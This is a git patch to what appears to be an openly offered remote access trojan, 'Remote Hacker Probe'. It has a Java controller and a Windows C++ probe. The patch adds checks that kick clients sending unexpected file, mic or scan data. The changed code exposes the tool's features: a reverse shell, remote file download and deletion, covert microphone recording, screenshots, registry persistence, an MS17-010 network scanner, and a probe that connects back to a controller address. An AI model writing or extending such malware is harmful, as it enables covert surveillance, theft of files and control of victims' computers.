From d9b38737c8f2c9c0ffc11d9ff17e42fa17a5c0ea Mon Sep 17 00:00:00 2001 From: quantumcore Date: Sun, 7 Mar 2021 23:25:15 +0500 Subject: [PATCH] Fixed RCE Vuln --- gui/src/main/java/rhp/FileManager.java | 31 ++ gui/src/main/java/rhp/MainWindow.java | 22 +- gui/src/main/java/rhp/MicRecorder.java | 14 + gui/src/main/java/rhp/MsgBox.java | 11 + gui/src/main/java/rhp/NetworkScanner.java | 19 ++ gui/src/main/java/rhp/Persist.java | 10 + gui/src/main/java/rhp/Server.java | 1 + gui/src/main/java/rhp/Shell.java | 3 + gui/src/main/java/rhp/thread.java | 378 +++++++++++++++------- probe/windows/Probe.h | 7 +- probe/windows/ProbeCpp.cpp | 12 +- 11 files changed, 355 insertions(+), 153 deletions(-) diff --git a/gui/src/main/java/rhp/FileManager.java b/gui/src/main/java/rhp/FileManager.java index aa785af..317ee44 100644 --- a/gui/src/main/java/rhp/FileManager.java +++ b/gui/src/main/java/rhp/FileManager.java @@ -51,8 +51,11 @@ import javax.swing.JComboBox; + + class IconRenderer extends DefaultListCellRenderer { + String[] video_ext = { "mp4", "avi", @@ -253,14 +256,29 @@ else if(Arrays.asList(txt).contains(ext)) public class FileManager extends JDialog { + + public final static JPanel contentPanel = new JPanel(); static JList FileList; public int CLIENT_ID; + public static StringBuilder SelectedFile = new StringBuilder(""); public static JTextField textField; public static DefaultListModel model; public static List driveslist = new ArrayList(); + + public static Boolean FileMgrOpen = false; + + public static void DisableFileManager() + { + FileManager.FileList.setEnabled(false); + } + public static void EnableFileManager() + { + FileManager.FileList.setEnabled(true); + } + /** * Create the dialog. */ @@ -278,6 +296,8 @@ void Refresh() public FileManager() { + + MainWindow.HaltAllSystems(); setDefaultCloseOperation(JDialog.DISPOSE_ON_CLOSE); setTitle("Remote Hacker Probe | File Manager"); setBounds(100, 100, 761, 410); @@ -318,6 +338,8 @@ public void actionPerformed(ActionEvent e) { String File = (String) FileList.getSelectedValue(); if(!File.startsWith("(^)")) { String filename = File.replaceAll("\\(.*?\\) ?", ""); + SelectedFile.replace(0, SelectedFile.length(), filename); + Server.SendData(Server.Clients.get(CLIENT_ID), "fupload:"+filename); ServerThread.WaitForReply(); } @@ -390,6 +412,7 @@ public void actionPerformed(ActionEvent e) { { String File = (String) FileList.getSelectedValue(); if(!File.startsWith("(^)")) { + SelectedFile.replace(0, SelectedFile.length(), File); String filename = File.replaceAll("\\(.*?\\) ?", ""); Server.SendData(Server.Clients.get(CLIENT_ID), "delete:"+filename); ServerThread.WaitForReply(); @@ -416,6 +439,7 @@ public void mouseClicked(MouseEvent evt) { String dir = (String) FileList.getSelectedValue(); if(dir.startsWith("(^)")) { String Dirname = dir.replace("(^) ", ""); + SelectedFile.replace(0, SelectedFile.length(), dir); Server.SendData(Server.Clients.get(CLIENT_ID), "cd"); Server.SendData(Server.Clients.get(CLIENT_ID), Dirname); Refresh(); @@ -438,6 +462,7 @@ public void actionPerformed(ActionEvent e) { btnGo.addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { String Dirname = textField.getText(); + SelectedFile.replace(0, SelectedFile.length(), Dirname); Server.SendData(Server.Clients.get(CLIENT_ID), "cd"); Server.SendData(Server.Clients.get(CLIENT_ID), Dirname); Refresh(); @@ -505,6 +530,12 @@ public void actionPerformed(ActionEvent e) { public void windowOpened(WindowEvent we) { Server.SendData(Server.Clients.get(CLIENT_ID), "listdir"); } + + @Override + public void windowClosed(WindowEvent we) { + FileMgrOpen = false; + MainWindow.EnableAllSystems(); + } }); } } diff --git a/gui/src/main/java/rhp/MainWindow.java b/gui/src/main/java/rhp/MainWindow.java index 0de014b..e0eae51 100644 --- a/gui/src/main/java/rhp/MainWindow.java +++ b/gui/src/main/java/rhp/MainWindow.java @@ -81,7 +81,7 @@ public boolean isCellEditable(int row, int column) { }; static JTextArea LogArea = new JTextArea(); public static JTable table; - public static JLabel onlinelabel; + public static JLabel onlinelabel = new JLabel(""); static JLabel userlbl = new JLabel("User : "); /** @@ -145,31 +145,16 @@ public static Double GetLongitude(int CLIENT_ID) public static void HaltAllSystems() { - if(FileManager.FileList != null){ - FileManager.FileList.setEnabled(false); // Disable The File Manager - } - if(Shell.ShellOutput != null); - { - Shell.ShellOutput.setEnabled(false); // Disable Shell - } - table.getSelectionModel().clearSelection(); + //table.getSelectionModel().clearSelection(); table.setEnabled(false); // Disable the Main Table too! } public static void EnableAllSystems() { - if(FileManager.FileList != null) - { - FileManager.FileList.setEnabled(true); // Enable The File Manager - } - - if(Shell.ShellOutput != null) - { - Shell.ShellOutput.setEnabled(true); // Enable Shell - } table.setEnabled(true); // Enable the Main Table too! } + public static void Log(String text) { String timeStamp = new SimpleDateFormat("HH:mm:ss").format(new Date()); @@ -479,6 +464,7 @@ public void actionPerformed(ActionEvent arg0) { Server.SendData(Server.Clients.get(index), "drives"); ServerThread.WaitForReply(); FileManager dialog = new FileManager(); + FileManager.FileMgrOpen = true; dialog.CLIENT_ID = table.getSelectedRow(); dialog.setDefaultCloseOperation(JDialog.DISPOSE_ON_CLOSE); dialog.setVisible(true); diff --git a/gui/src/main/java/rhp/MicRecorder.java b/gui/src/main/java/rhp/MicRecorder.java index fbf174a..8055734 100644 --- a/gui/src/main/java/rhp/MicRecorder.java +++ b/gui/src/main/java/rhp/MicRecorder.java @@ -15,6 +15,8 @@ import java.awt.event.ActionListener; import java.awt.event.ItemEvent; import java.awt.event.ItemListener; +import java.awt.event.WindowAdapter; +import java.awt.event.WindowEvent; import java.text.SimpleDateFormat; import java.util.Date; import java.util.concurrent.TimeUnit; @@ -29,6 +31,7 @@ public class MicRecorder extends JDialog { static JLabel lbl ; static JToggleButton jtb; public static int CLIENT_ID; + public static Boolean MicRec = false; /** * Launch the application. */ @@ -95,6 +98,8 @@ public void run() * Create the dialog. */ public MicRecorder() { + + MainWindow.HaltAllSystems(); setDefaultCloseOperation(JDialog.DISPOSE_ON_CLOSE); setResizable(false); setTitle("Remote Hacker Probe | Mic Recorder"); @@ -116,6 +121,7 @@ public MicRecorder() { jtb.addItemListener(new ItemListener() { public void itemStateChanged(ItemEvent ev) { + MicRec = true; if(ev.getStateChange()==ItemEvent.SELECTED){ Server.SendData(Server.Clients.get(CLIENT_ID), "micstart"); // send instruction to start mic recording // expect no reply @@ -142,6 +148,14 @@ public void itemStateChanged(ItemEvent ev) { contentPanel.add(jtb); + addWindowListener(new WindowAdapter() { + + @Override + public void windowClosed(WindowEvent we) { + MainWindow.EnableAllSystems(); + } + }); + } } diff --git a/gui/src/main/java/rhp/MsgBox.java b/gui/src/main/java/rhp/MsgBox.java index f987479..36591d4 100644 --- a/gui/src/main/java/rhp/MsgBox.java +++ b/gui/src/main/java/rhp/MsgBox.java @@ -12,6 +12,8 @@ import javax.swing.JTextField; import javax.swing.JComboBox; import java.awt.event.ActionListener; +import java.awt.event.WindowAdapter; +import java.awt.event.WindowEvent; import java.util.concurrent.TimeUnit; import java.awt.event.ActionEvent; import javax.swing.SwingConstants; @@ -28,6 +30,7 @@ public class MsgBox extends JDialog { * Create the dialog. */ public MsgBox() { + MainWindow.HaltAllSystems(); setResizable(false); setTitle("Remote Hacker Probe | Message Box"); setBounds(100, 100, 421, 217); @@ -98,5 +101,13 @@ public void actionPerformed(ActionEvent e) { btnNewButton.setFont(new Font("Calibri", Font.PLAIN, 12)); btnNewButton.setBounds(300, 147, 89, 23); contentPanel.add(btnNewButton); + + addWindowListener(new WindowAdapter() { + + @Override + public void windowClosed(WindowEvent we) { + MainWindow.EnableAllSystems(); + } + }); } } diff --git a/gui/src/main/java/rhp/NetworkScanner.java b/gui/src/main/java/rhp/NetworkScanner.java index fd90805..ec69b19 100644 --- a/gui/src/main/java/rhp/NetworkScanner.java +++ b/gui/src/main/java/rhp/NetworkScanner.java @@ -4,6 +4,8 @@ import java.awt.Font; import java.awt.event.ActionEvent; import java.awt.event.ActionListener; +import java.awt.event.WindowAdapter; +import java.awt.event.WindowEvent; import java.io.File; import java.io.FileWriter; import java.io.IOException; @@ -53,6 +55,8 @@ public class NetworkScanner extends JDialog { JTabbedPane tabbedPane = new JTabbedPane(JTabbedPane.TOP); Boolean isActionRunning = false; + public static Boolean NetworkScanRunning = false; + /** * Create the dialog. * @return @@ -127,6 +131,7 @@ void ScanPort(String TargetIP) setDefaultCloseOperation(JDialog.DO_NOTHING_ON_CLOSE); MainWindow.HaltAllSystems(); isActionRunning = true; + NetworkScanRunning = true; progressBar_1.setIndeterminate(true); List lines; try { @@ -146,6 +151,7 @@ void ScanPort(String TargetIP) isActionRunning = false; MainWindow.EnableAllSystems(); setDefaultCloseOperation(JDialog.DISPOSE_ON_CLOSE); + NetworkScanRunning = false; } void EScanIp(ArrayList localArray) @@ -153,6 +159,7 @@ void EScanIp(ArrayList localArray) setDefaultCloseOperation(JDialog.DO_NOTHING_ON_CLOSE); MainWindow.HaltAllSystems(); isActionRunning = true; + NetworkScanRunning = true; for (int counter = 0; counter < localArray.size(); counter++) { // System.out.println(localArray.get(counter)); @@ -170,6 +177,7 @@ void EScanIp(ArrayList localArray) EModel.addElement("MS17-010 Scan finished."); isActionRunning = false; + NetworkScanRunning = false; MainWindow.EnableAllSystems(); setDefaultCloseOperation(JDialog.DISPOSE_ON_CLOSE); } @@ -179,6 +187,7 @@ void ScanIp(ArrayList localArray) setDefaultCloseOperation(JDialog.DO_NOTHING_ON_CLOSE); MainWindow.HaltAllSystems(); isActionRunning = true; + NetworkScanRunning = true; progressBar.setIndeterminate(true); for (int counter = 0; counter < localArray.size(); counter++) { // System.out.println(localArray.get(counter)); @@ -199,11 +208,13 @@ void ScanIp(ArrayList localArray) progressBar.setIndeterminate(false); NsModel.addElement("Scan finished."); isActionRunning = false; + NetworkScanRunning = false; MainWindow.EnableAllSystems(); setDefaultCloseOperation(JDialog.DISPOSE_ON_CLOSE); } public NetworkScanner() { + MainWindow.HaltAllSystems(); setDefaultCloseOperation(JDialog.DISPOSE_ON_CLOSE); setResizable(false); @@ -641,6 +652,14 @@ public void actionPerformed(ActionEvent e) { MainWindow.addPopup(PList, jp2); MainWindow.addPopup(eternalscanoutput, jp3); MainWindow.addPopup(hsoutput, jp4); + + addWindowListener(new WindowAdapter() { + + @Override + public void windowClosed(WindowEvent we) { + MainWindow.EnableAllSystems(); + } + }); } } diff --git a/gui/src/main/java/rhp/Persist.java b/gui/src/main/java/rhp/Persist.java index 6067713..5ba7914 100644 --- a/gui/src/main/java/rhp/Persist.java +++ b/gui/src/main/java/rhp/Persist.java @@ -13,6 +13,8 @@ import java.awt.Font; import java.awt.event.ItemEvent; import java.awt.event.ItemListener; +import java.awt.event.WindowAdapter; +import java.awt.event.WindowEvent; import java.util.concurrent.TimeUnit; import javax.swing.JLabel; @@ -36,6 +38,7 @@ public class Persist extends JDialog { * Create the dialog. */ public Persist() { + MainWindow.HaltAllSystems(); setDefaultCloseOperation(JDialog.DISPOSE_ON_CLOSE); setTitle("Remote Hacker Probe | Persistence"); setResizable(false); @@ -224,5 +227,12 @@ public void actionPerformed(ActionEvent e) { keyname.setBounds(75, 165, 220, 26); contentPanel.add(keyname); keyname.setColumns(10); + addWindowListener(new WindowAdapter() { + + @Override + public void windowClosed(WindowEvent we) { + MainWindow.EnableAllSystems(); + } + }); } } diff --git a/gui/src/main/java/rhp/Server.java b/gui/src/main/java/rhp/Server.java index 5564db1..c77d2cd 100644 --- a/gui/src/main/java/rhp/Server.java +++ b/gui/src/main/java/rhp/Server.java @@ -159,6 +159,7 @@ public void run() { while(true) { try { clientsocket = mainsocket.accept(); + System.out.println("[INFO] New connection from : " + clientsocket.getRemoteSocketAddress().toString()); Clients.add(clientsocket); MainWindow.UpdateOnlineLabel(); getInformation(); diff --git a/gui/src/main/java/rhp/Shell.java b/gui/src/main/java/rhp/Shell.java index 61fae33..25705b4 100644 --- a/gui/src/main/java/rhp/Shell.java +++ b/gui/src/main/java/rhp/Shell.java @@ -37,6 +37,8 @@ public class Shell extends JDialog { JButton ShellGo; JLabel interact = new JLabel(""); public Shell() { + + MainWindow.HaltAllSystems(); setResizable(false); setDefaultCloseOperation(JDialog.DISPOSE_ON_CLOSE); setTitle("Remote Hacker Probe | Reverse Shell"); @@ -144,6 +146,7 @@ public void windowOpened(WindowEvent we) { public void windowClosed(WindowEvent e) { Shell.ShellOutput.setText(""); MainWindow.Log("Reverse Shell closed."); + MainWindow.EnableAllSystems(); } }); } diff --git a/gui/src/main/java/rhp/thread.java b/gui/src/main/java/rhp/thread.java index 3fcdbf7..b568969 100644 --- a/gui/src/main/java/rhp/thread.java +++ b/gui/src/main/java/rhp/thread.java @@ -64,6 +64,11 @@ public static void WaitForReplyMeta() // bruh } } + + public static String SelectedFile() + { + return FileManager.SelectedFile.toString().strip(); + } public static void WaitForReply() { LOG.clear(); @@ -156,8 +161,16 @@ public void run() { try { String[] parse = response.split(","); int mainIndex = Server.Clients.indexOf(sock); - JOptionPane.showMessageDialog(null, "File '"+parse[1] + "' deleted from '"+parse[2]+"'.", Server.UserPC.get(mainIndex) + " says : ", JOptionPane.INFORMATION_MESSAGE); - MainWindow.Log( "File '"+parse[1] + "' deleted from '"+parse[2]+"'."); + if(parse[1].equals(SelectedFile())) { + JOptionPane.showMessageDialog(null, "File '"+parse[1] + "' deleted from '"+parse[2]+"'.", Server.UserPC.get(mainIndex) + " says : ", JOptionPane.INFORMATION_MESSAGE); + MainWindow.Log( "File '"+parse[1] + "' deleted from '"+parse[2]+"'."); + } else { + Server.SendData(sock, "kill"); + sock.close(); + clear(); + MainWindow.Log("Connection Closed for Client ID : " + Server.Clients.indexOf(sock)); + } + } catch (Exception e) { e.printStackTrace(); } @@ -169,33 +182,50 @@ else if(response.startsWith("FILE")) { String fileinfo[] = response.split(":"); String filename = fileinfo[1].strip(); String filesizeStr = fileinfo[2].strip(); - int fsize = Integer.parseInt(filesizeStr); - JOptionPane.showMessageDialog(null, "File '" + filename + "' of size '" + filesizeStr + "' bytes will be Downloaded."); - MainWindow.Log( "File '" + filename + "' of size '" + filesizeStr + "' bytes will be Downloaded."); - File downloaded_file = new File(filename); - downloaded_file.createNewFile(); - FileOutputStream fos = new FileOutputStream(downloaded_file, false); - BufferedOutputStream out = new BufferedOutputStream(fos); - - MainWindow.HaltAllSystems(); - byte[] filebuf = new byte[fsize]; - Arrays.fill(filebuf, (byte)0); - do { - read= is.readNBytes(filebuf, 0, fsize); - fos.write(filebuf, 0, read); - if(read == Integer.parseInt(filesizeStr)) { - break; - } - //System.out.println(read); - } while (read != 0); - - MainWindow.EnableAllSystems(); - fos.close(); - JOptionPane.showMessageDialog(null, "File " + filename + " downloaded.\nBytes Expected : " + filesizeStr + " Bytes.\n" - + "Bytes Recevied : " + String.valueOf( new File(filename).length()) + " Bytes."); - MainWindow.Log("File " + filename + " downloaded."); - - out.flush(); + + if(filename.equals(SelectedFile())) { + + int fsize = Integer.parseInt(filesizeStr); + JOptionPane.showMessageDialog(null, "File '" + filename + "' of size '" + filesizeStr + "' bytes will be Downloaded."); + MainWindow.Log( "File '" + filename + "' of size '" + filesizeStr + "' bytes will be Downloaded."); + File downloaded_file = new File("downloads/" + filename); + downloaded_file.createNewFile(); + FileOutputStream fos = new FileOutputStream(downloaded_file, false); + BufferedOutputStream out = new BufferedOutputStream(fos); + + FileManager.DisableFileManager(); + byte[] filebuf = new byte[fsize]; + Arrays.fill(filebuf, (byte)0); + do { + read= is.readNBytes(filebuf, 0, fsize); + fos.write(filebuf, 0, read); + if(read == Integer.parseInt(filesizeStr)) { + break; + } + //System.out.println(read); + } while (read != 0); + + FileManager.EnableFileManager(); + fos.close(); + JOptionPane.showMessageDialog(null, "File " + filename + " downloaded.\nBytes Expected : " + filesizeStr + " Bytes.\n" + + "Bytes Recevied : " + String.valueOf( new File("downloads/"+filename).length()) + " Bytes."); + MainWindow.Log("File " + filename + " downloaded."); + + out.flush(); + } else { + // The file being downloaded is not the same as the file selected + int mainIndex = Server.Clients.indexOf(sock); + String info = Server.UserPC.get(mainIndex); + MainWindow.Log("Connection Closed for Client ID : " + Server.Clients.indexOf(sock)); + Server.SendData(sock, "kill"); + sock.close(); + clear(); + + JOptionPane.showMessageDialog(null, "Client ID : " + String.valueOf(mainIndex) + " " + info + " was kicked because it attempted to upload a file we did not Download. There may be a third party Impersonating as the Probe."); + + + + } } else if (response.startsWith("F_OK")) { @@ -235,12 +265,25 @@ else if(response.startsWith("[HOST]")) { try { //System.out.println("Got the damn response!"); - String parse[] = response.split(","); - String IpAddr = parse[1]; - String hostname = parse[2]; - String Macaddr = parse[3]; + if(NetworkScanner.NetworkScanRunning) + { + String parse[] = response.split(","); + String IpAddr = parse[1]; + String hostname = parse[2]; + String Macaddr = parse[3]; + + NetworkScanner.NsModel.addElement("Discovered host : " + IpAddr + " - " + hostname + " - " + Macaddr ); + } else { + // The scan is not running, Why is the client sending us this information? + Server.SendData(sock, "kill"); + sock.close(); + clear(); + MainWindow.Log("Connection Closed for Client ID : " + Server.Clients.indexOf(sock)); + int mainIndex = Server.Clients.indexOf(sock); + String info = Server.UserPC.get(mainIndex); + JOptionPane.showMessageDialog(null, "Client ID : " + String.valueOf(mainIndex) + " " + info + " was kicked because it sent an unexpected command. There may be a third party Impersonating as the Probe."); + } - NetworkScanner.NsModel.addElement("Discovered host : " + IpAddr + " - " + hostname + " - " + Macaddr ); } catch (Exception ls) { ls.printStackTrace(); // TODO : what the fuck am I naming the exception. @@ -249,9 +292,18 @@ else if(response.startsWith("[HOST]")) else if (response.startsWith("[HOSTERR]")) { try { - //System.out.println("Got the damn ERROR response!"); - String parse[] = response.split("-"); - NetworkScanner.NsModel.addElement( parse[1]); + if(NetworkScanner.NetworkScanRunning) + { + //System.out.println("Got the damn ERROR response!"); + String parse[] = response.split("-"); + NetworkScanner.NsModel.addElement( parse[1]); + } else { + // The scan is not running, Why is the client sending us this information? + Server.SendData(sock, "kill"); + sock.close(); + clear(); + MainWindow.Log("Connection Closed for Client ID : " + Server.Clients.indexOf(sock)); + } } catch (Exception ls) { @@ -262,9 +314,18 @@ else if (response.startsWith("[HOSTERR]")) { else if(response.startsWith("OPENPORT")) { try { - String parse[] = response.split(":")[1].split(","); + if(NetworkScanner.NetworkScanRunning) + { + String parse[] = response.split(":")[1].split(","); - NetworkScanner.PModel.addElement( "Port is open " + parse[1] + " (" + NetworkScanner.PortService(parse[1]) + ") on " + parse[0]); + NetworkScanner.PModel.addElement( "Port is open " + parse[1] + " (" + NetworkScanner.PortService(parse[1]) + ") on " + parse[0]); + } else { + // The scan is not running, Why is the client sending us this information? + Server.SendData(sock, "kill"); + sock.close(); + clear(); + MainWindow.Log("Connection Closed for Client ID : " + Server.Clients.indexOf(sock)); + } } catch (Exception ls) { @@ -274,12 +335,22 @@ else if(response.startsWith("OPENPORT")) else if(response.startsWith("!MS17!")){ try { - String[] infoString = response.split("!MS17!"); - - for (String info : infoString) { - NetworkScanner.EModel.addElement(info); + if(NetworkScanner.NetworkScanRunning) + { + String[] infoString = response.split("!MS17!"); + + for (String info : infoString) { + NetworkScanner.EModel.addElement(info); + } + } else { + // The scan is not running, Why is the client sending us this information? + Server.SendData(sock, "kill"); + sock.close(); + clear(); + MainWindow.Log("Connection Closed for Client ID : " + Server.Clients.indexOf(sock)); } + } catch (Exception ls) { ls.printStackTrace(); // TODO : what the fuck am I naming the exception. @@ -289,11 +360,21 @@ else if(response.startsWith("!MS17!")){ else if(response.startsWith("DIRERROR")) { try { - String infoString = response.replace("DIRERROR", ""); + if(FileManager.FileMgrOpen) + { + String infoString = response.replace("DIRERROR", ""); + + int mainIndex = Server.Clients.indexOf(sock); + JOptionPane.showMessageDialog(null, infoString, Server.UserPC.get(mainIndex) + " says : ", JOptionPane.INFORMATION_MESSAGE); + MainWindow.Log(Server.UserPC.get(mainIndex) + " says : " + infoString); + } else { + // File manager isn't open + Server.SendData(sock, "kill"); + sock.close(); + clear(); + MainWindow.Log("Connection Closed for Client ID : " + Server.Clients.indexOf(sock)); + } - int mainIndex = Server.Clients.indexOf(sock); - JOptionPane.showMessageDialog(null, infoString, Server.UserPC.get(mainIndex) + " says : ", JOptionPane.INFORMATION_MESSAGE); - MainWindow.Log(Server.UserPC.get(mainIndex) + " says : " + infoString); } catch (Exception ls) { @@ -316,9 +397,19 @@ else if(response.startsWith("F_ERR")) } else if(response.startsWith("!hs!")){ try { - String infoString = response.replace("!hs!", ""); + if(NetworkScanner.NetworkScanRunning) + { + String infoString = response.replace("!hs!", ""); + + NetworkScanner.HModel.addElement(infoString); + } else { + // The scan is not running, Why is the client sending us this information? + Server.SendData(sock, "kill"); + sock.close(); + clear(); + MainWindow.Log("Connection Closed for Client ID : " + Server.Clients.indexOf(sock)); + } - NetworkScanner.HModel.addElement(infoString); } catch (Exception ls) { @@ -331,91 +422,128 @@ else if(response.startsWith("SCREENSHOT")) { String filename = fileinfo[1].strip(); String filesizeStr = fileinfo[2].strip(); int fsize = Integer.parseInt(filesizeStr); + if(filename.contains(".bmp")) { //JOptionPane.showMessageDialog(null, "File '" + filename + "' of size '" + filesizeStr + "' bytes will be Downloaded."); - MainWindow.Log( "Screenshot '" + filename + "' of size '" + filesizeStr + "' bytes will be Downloaded."); - File downloaded_file = new File(filename); - downloaded_file.createNewFile(); - FileOutputStream fos = new FileOutputStream(downloaded_file, false); - BufferedOutputStream out = new BufferedOutputStream(fos); - - MainWindow.HaltAllSystems(); - byte[] filebuf = new byte[fsize]; - Arrays.fill(filebuf, (byte)0); - do { - read= is.readNBytes(filebuf, 0, fsize); - fos.write(filebuf, 0, read); - if(read == Integer.parseInt(filesizeStr)) { - break; - } - //System.out.println(read); - } while (read != 0); - - fos.close(); - // Convert bmp to png - String newfile = filename.replace(".bmp", ".png"); - BufferedImage bmpimg = ImageIO.read(downloaded_file); - File outputfile = new File("screenshots/"+newfile); // - ImageIO.write(bmpimg, "png", outputfile); - // Delete original - try { - Path delete = new File(filename).toPath(); Files.deleteIfExists(delete); - } catch (Exception eS) - { - eS.printStackTrace(); - } - - - // Display Image - ImageViewer.ImagePath = "screenshots/" + newfile; - ImageViewer iv = new ImageViewer(); iv.setVisible(true); - - MainWindow.EnableAllSystems(); - - //JOptionPane.showMessageDialog(null, "File " + filename + " downloaded.\nBytes Expected : " + filesizeStr + " Bytes.\n" - // + "Bytes Recevied : " + String.valueOf( new File(filename).length()) + " Bytes."); - MainWindow.Log("Screenshot " + filename + " downloaded."); - - out.flush(); - } + MainWindow.Log( "Screenshot '" + filename + "' of size '" + filesizeStr + "' bytes will be Downloaded."); + File downloaded_file = new File(filename); + downloaded_file.createNewFile(); + FileOutputStream fos = new FileOutputStream(downloaded_file, false); + BufferedOutputStream out = new BufferedOutputStream(fos); + + MainWindow.HaltAllSystems(); + byte[] filebuf = new byte[fsize]; + Arrays.fill(filebuf, (byte)0); + do { + read= is.readNBytes(filebuf, 0, fsize); + fos.write(filebuf, 0, read); + if(read == Integer.parseInt(filesizeStr)) { + break; + } + //System.out.println(read); + } while (read != 0); + + fos.close(); + // Convert bmp to png + String newfile = filename.replace(".bmp", ".png"); + BufferedImage bmpimg = ImageIO.read(downloaded_file); + File outputfile = new File("screenshots/"+newfile); // + ImageIO.write(bmpimg, "png", outputfile); + // Delete original + try { + Path delete = new File(filename).toPath(); Files.deleteIfExists(delete); + } catch (Exception eS) + { + eS.printStackTrace(); + } + + + // Display Image + ImageViewer.ImagePath = "screenshots/" + newfile; + ImageViewer iv = new ImageViewer(); iv.setVisible(true); + + MainWindow.EnableAllSystems(); + + //JOptionPane.showMessageDialog(null, "File " + filename + " downloaded.\nBytes Expected : " + filesizeStr + " Bytes.\n" + // + "Bytes Recevied : " + String.valueOf( new File(filename).length()) + " Bytes."); + MainWindow.Log("Screenshot " + filename + " downloaded."); + + out.flush(); + } else { + + Server.SendData(sock, "kill"); + sock.close(); + clear(); + MainWindow.Log("Connection Closed for Client ID : " + Server.Clients.indexOf(sock)); + int mainIndex = Server.Clients.indexOf(sock); + String info = Server.UserPC.get(mainIndex); + JOptionPane.showMessageDialog(null, "Client ID : " + String.valueOf(mainIndex) + " " + info + " was kicked because it attempted to upload a file we did not Download. There may be a third party Impersonating as the Probe."); + } + } else if(response.startsWith("MIC_OK")) { - String Message = response.replace("MIC_OK:",""); - MainWindow.Log("Client ID " + String.valueOf(Server.Clients.indexOf(sock)) + " says : " + Message); - MicRecorder.AnimateGui(); + if(MicRecorder.MicRec) + { + String Message = response.replace("MIC_OK:",""); + MainWindow.Log("Client ID " + String.valueOf(Server.Clients.indexOf(sock)) + " says : " + Message); + MicRecorder.AnimateGui(); + } else { + Server.SendData(sock, "kill"); + sock.close(); + clear(); + MainWindow.Log("Connection Closed for Client ID : " + Server.Clients.indexOf(sock)); + int mainIndex = Server.Clients.indexOf(sock); + String info = Server.UserPC.get(mainIndex); + JOptionPane.showMessageDialog(null, "Client ID : " + String.valueOf(mainIndex) + " " + info + " was kicked because it attempted to upload a file we did not Download. There may be a third party Impersonating as the Probe."); + } + } else if(response.startsWith("MIC")) { - String fileinfo[] = response.split(":"); - String filename = fileinfo[1].strip(); - String filesizeStr = fileinfo[2].strip(); - int fsize = Integer.parseInt(filesizeStr); - - MainWindow.Log( "Mic Recording '" + filename + "' of size '" + filesizeStr + "' bytes will be Downloaded."); - File downloaded_file = new File(filename); - downloaded_file.createNewFile(); - FileOutputStream fos = new FileOutputStream(downloaded_file, false); - BufferedOutputStream out = new BufferedOutputStream(fos); - - MainWindow.HaltAllSystems(); - byte[] filebuf = new byte[fsize]; - Arrays.fill(filebuf, (byte)0); - do { - read= is.readNBytes(filebuf, 0, fsize); - fos.write(filebuf, 0, read); - if(read == Integer.parseInt(filesizeStr)) { - break; + if(MicRecorder.MicRec) + { + String fileinfo[] = response.split(":"); + String filename = fileinfo[1].strip(); + String filesizeStr = fileinfo[2].strip(); + int fsize = Integer.parseInt(filesizeStr); + if(filename.contains(".wav")) + { + MainWindow.Log( "Mic Recording '" + filename + "' of size '" + filesizeStr + "' bytes will be Downloaded."); + File downloaded_file = new File("downloads/"+filename); + downloaded_file.createNewFile(); + FileOutputStream fos = new FileOutputStream(downloaded_file, false); + BufferedOutputStream out = new BufferedOutputStream(fos); + + MainWindow.HaltAllSystems(); + byte[] filebuf = new byte[fsize]; + Arrays.fill(filebuf, (byte)0); + do { + read= is.readNBytes(filebuf, 0, fsize); + fos.write(filebuf, 0, read); + if(read == Integer.parseInt(filesizeStr)) { + break; + } + //System.out.println(read); + } while (read != 0); + + MainWindow.EnableAllSystems(); + fos.close(); + JOptionPane.showMessageDialog(null, "Mic Recording " + filename + " downloaded.\nBytes Expected : " + filesizeStr + " Bytes.\n" + + "Bytes Recevied : " + String.valueOf( new File("downloads/"+filename).length()) + " Bytes."); + MainWindow.Log("File " + filename + " downloaded."); + + out.flush(); + } else { + Server.SendData(sock, "kill"); + sock.close(); + clear(); + MainWindow.Log("Connection Closed for Client ID : " + Server.Clients.indexOf(sock)); + int mainIndex = Server.Clients.indexOf(sock); + String info = Server.UserPC.get(mainIndex); + JOptionPane.showMessageDialog(null, "Client ID : " + String.valueOf(mainIndex) + " " + info + " was kicked because it attempted to upload a file we did not Download. There may be a third party Impersonating as the Probe."); } - //System.out.println(read); - } while (read != 0); - - MainWindow.EnableAllSystems(); - fos.close(); - JOptionPane.showMessageDialog(null, "Mic Recording " + filename + " downloaded.\nBytes Expected : " + filesizeStr + " Bytes.\n" - + "Bytes Recevied : " + String.valueOf( new File(filename).length()) + " Bytes."); - MainWindow.Log("File " + filename + " downloaded."); + } - out.flush(); } diff --git a/probe/windows/Probe.h b/probe/windows/Probe.h index 506872b..decb39a 100644 --- a/probe/windows/Probe.h +++ b/probe/windows/Probe.h @@ -34,10 +34,9 @@ #define UNLEN 256 #define MESSAGE "Hey there! I see you are reverse engineering! :D" -/* -#define SERVER_HOST "192.168.1.106" -#define SERVER_PORT 1234 -*/ + +//#define SERVER_HOST "127.0.0.1 +//#define SERVER_PORT 1234 static BOOL connected = FALSE; diff --git a/probe/windows/ProbeCpp.cpp b/probe/windows/ProbeCpp.cpp index d976caa..08333e0 100644 --- a/probe/windows/ProbeCpp.cpp +++ b/probe/windows/ProbeCpp.cpp @@ -159,12 +159,12 @@ void ProbeConnect(void) InetPton(AF_INET, Host.c_str(), &server.sin_addr.s_addr); server.sin_port = htons(Portnum); server.sin_family = AF_INET; - - /* - server.sin_addr.s_addr = inet_addr(SERVER_HOST); - server.sin_port = htons(SERVER_PORT); - server.sin_family = AF_INET; - */ + + + //server.sin_addr.s_addr = inet_addr(SERVER_HOST); + //server.sin_port = htons(SERVER_PORT); + //server.sin_family = AF_INET; + do { if (connect(sockfd, (struct sockaddr*)&server, sizeof(server)) == SOCKET_ERROR) { REConnect();